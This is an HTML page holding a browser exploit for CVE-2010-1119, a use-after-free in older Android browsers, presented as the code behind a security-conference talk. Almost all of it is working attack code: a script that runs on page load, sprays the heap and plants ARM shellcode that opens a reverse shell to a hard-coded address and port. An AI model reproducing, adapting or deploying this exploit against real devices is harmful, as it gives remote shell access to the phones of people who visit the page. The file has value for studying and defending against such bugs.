<html> <!-- # Exploit Title: android exploit for 2010-1119 use after free # Date: 2011/03/11 # Author: MJ Keith # Software Link: http://www.android.com/ # Version: 2.0 ,2.1 , 2.1.1 # Tested on: Android # CVE : 2010-1119 This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides email: mkeith AT exploitscience.org --> <head> <script language="JavaScript"> function heap() { var id = document.getElementById("target"); var attribute = id.getAttributeNode('id'); nodes = attribute.childNodes; document.body.removeChild(id); attribute.removeChild(nodes[0]); setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); }; var scode = unescape("\u0060\u0060"); var scode2 = unescape("\u5005\ue1a0"); var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\ \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002"); shell += unescape("\uae08"); // Port = 2222 shell += unescape("\u000a\u0202"); // IP = 10.0.2.2 shell += unescape("\u2000\u2000"); // string terminate do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 300; i++){ if (i<130){ target[i] = scode;} if (i>130){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>250){ // alert("freeze"); nodes[0].textContent} } }, 0); } </script> </head> <body onload=heap()> <p id=target></p> </body> </html>